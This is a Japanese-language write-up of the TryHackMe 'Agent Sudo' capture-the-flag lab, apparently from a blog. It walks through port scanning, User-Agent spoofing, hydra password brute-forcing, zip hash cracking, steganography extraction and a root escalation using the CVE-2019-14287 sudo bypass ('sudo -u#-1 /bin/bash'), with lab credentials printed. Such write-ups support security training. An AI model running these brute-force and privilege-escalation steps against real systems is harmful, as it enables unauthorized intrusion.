TryHackMe: Agent Sudo Writeup

TryHackMeのAgent Sudoのwriteupおよびメモ。


Task 2: Enumerate

How many open ports?

nmap -Pn -A
└─$ nmap -Pn -A
Starting Nmap 7.94SVN ( ) at 2024-05-20 09:41 EDT
Nmap scan report for
Host is up (0.30s latency).
Not shown: 997 closed tcp ports (conn-refused)
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 38.92 seconds


How you redirect yourself to a secret page?にアクセスしたところ、以下のメッセージを発見。

 Dear agents, 

 Use your own codename as user-agent to access the site. 

 Agent R


What is the agent name?


User-AgentRと指定したところ、サーバーの応答の中にWhat are you doing! Are you one of the 25 employees? If not, I going to report this incidentというメッセージを発見。

curl -i -H "User-Agent: R"
└─$ curl -i -H "User-Agent: R"       
HTTP/1.1 200 OK
Date: Mon, 20 May 2024 13:53:43 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=UTF-8

What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>

        Dear agents,
        Use your own <b>codename</b> as user-agent to access the site.
        Agent R

User-Agentの値をA、B、C、という具合に変えていったところ、User-Agent: Cの時にサーバーからの応答に変化があった。

curl -i -H "User-Agent: C"
curl -i -H "User-Agent: C"
HTTP/1.1 302 Found
Date: Mon, 20 May 2024 13:55:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: agent_C_attention.php
Content-Length: 218
Content-Type: text/html; charset=UTF-8

<!DocType html>

        Dear agents,
        Use your own <b>codename</b> as user-agent to access the site.
        Agent R


Attention chris,

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

Agent R 

上記より、エージェント Cの名前はchrisと判明。

Task 3: Hash cracking and brute-force

FTP password


hydra -l "chris" -P /usr/share/wordlists/rockyou.txt -V -f
[21][ftp] host:   login: chris   password: crystal


Zip file password


tnftp ftp://chris:crystal@
└─$ tnftp ftp://chris:crystal@
Connected to
220 (vsFTPd 3.0.3)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||21348|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png



Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

Agent C

画像ファイルの中にエージェント Jのログイン用のパスワードが仕込まれているらしい。


└─$ strings -n 8 cutie.png| more          
8">;&@B&A>9RO =:#<A
.A0,"oS I


binwalk -e cutie.png
└─$ binwalk -e cutie.png     

0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression

WARNING: Extractor.execute failed to run external extractor 'jar xvf '%e'': [Errno 2] No such file or directory: 'jar', 'jar xvf '%e'' might not be installed correctly
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

└─$ unzip -Z           
Zip file size: 280 bytes, number of entries: 1
-rw-r--r--  6.3 unx       86 Bx u099 19-Oct-29 20:29 To_agentR.txt
1 file, 86 bytes uncompressed, 86 bytes compressed:  0.0%


John The Ripperでパスワードをクラックすることにした。


zip2john > zip.hash
└─$ zip2john > zip.hash                   
└─$ file zip.hash 
zip.hash: ASCII text
└─$ cat zip.hash  $zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$

John The Ripperでハッシュをクラック。

john zip.hash
└─$ john zip.hash                                                                 
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien            (     
1g 0:00:00:01 DONE 2/3 (2024-05-20 10:24) 0.8547g/s 37986p/s 37986c/s 37986C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.



└─$ 7z x   

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 280 bytes (1 KiB)

Extracting archive:
Path =
Type = zip
Physical Size = 280

Enter password (will not be echoed):
Everything is Ok

Size:       86
Compressed: 280


Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

Agent R

steg password



stegseek --crack cute-alien.jpg /usr/share/wordlists/rockyou.txt output.txt
└─$ stegseek --crack cute-alien.jpg /usr/share/wordlists/rockyou.txt output.txt
StegSeek 0.6 -

[i] Found passphrase: "Area51"           
[i] Original filename: "message.txt".
[i] Extracting to "output.txt".


Who is the other agent (in full name)?


Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,


SSH password

先の設問より、ユーザー jamesのSSHログインのパスワードはhackerrules!

Task 4: Capture the user flag

What is the user flag?


ssh james@
└─$ ssh james@
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:rt6rNpPo1pGMkl4PRRE7NaQKAHV+UNkS9BfrCy8jVCA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.
james@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:
 * Management:
 * Support:

 System information disabled due to load higher than 1.0

75 packages can be updated.
33 updates are security updates.

Last login: Tue Oct 29 14:26:27 2019
james@agent-sudo:~$ pwd
james@agent-sudo:~$ whoami


james@agent-sudo:~$ ls -la
total 80
drwxr-xr-x 4 james james  4096 Oct 29  2019 .
drwxr-xr-x 3 root  root   4096 Oct 29  2019 ..
-rw-r--r-- 1 james james 42189 Jun 19  2019 Alien_autospy.jpg
-rw------- 1 root  root    566 Oct 29  2019 .bash_history
-rw-r--r-- 1 james james   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james  3771 Apr  4  2018 .bashrc
drwx------ 2 james james  4096 Oct 29  2019 .cache
drwx------ 3 james james  4096 Oct 29  2019 .gnupg
-rw-r--r-- 1 james james   807 Apr  4  2018 .profile
-rw-r--r-- 1 james james     0 Oct 29  2019 .sudo_as_admin_successful
-rw-r--r-- 1 james james    33 Oct 29  2019 user_flag.txt

What is the incident of the photo called?


scp -r james@ .


画像ファイルを検索してみたところ、事件の名前はRoswell Alien Autopsyと判明した。

Task 5: Privilege escalation

CVE number for the escalation (Format: CVE-xxxx-xxxx)


ひとまず、sudo -lを叩いてみた。

james@agent-sudo:~$ sudo -l
[sudo] password for james: 
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash


james@agent-sudo:~$ sudo bash
Sorry, user james is not allowed to execute '/bin/bash' as root on agent-sudo.
james@agent-sudo:~$ sudo /bin/bash
Sorry, user james is not allowed to execute '/bin/bash' as root on agent-sudo.

sudo -lの応答にあった(ALL, !root) /bin/bashという書き方がなんとなく引っかかったので、ググってみたところ、CVE-2019-14287のPoCにたどり着いた。

What is the root flag?


sudo -u#-1 /bin/bash
james@agent-sudo:~$ sudo -u#-1 /bin/bash
[sudo] password for james: 
root@agent-sudo:~# whoami
root@agent-sudo:~# id
uid=0(root) gid=1000(james) groups=1000(james)


root@agent-sudo:~# ls -la /root
total 32
drwx------  4 root root 4096 Oct 29  2019 .
drwxr-xr-x 24 root root 4096 Oct 29  2019 ..
-rw-------  1 root root 1952 Oct 29  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Oct 29  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  197 Oct 29  2019 root.txt
drwx------  2 root root 4096 Oct 29  2019 .ssh

(Bonus) Who is Agent R?

root.txtの末尾にエージェント Rの本名が記載されていた。

Leave a Reply

Your email address will not be published. Required fields are marked *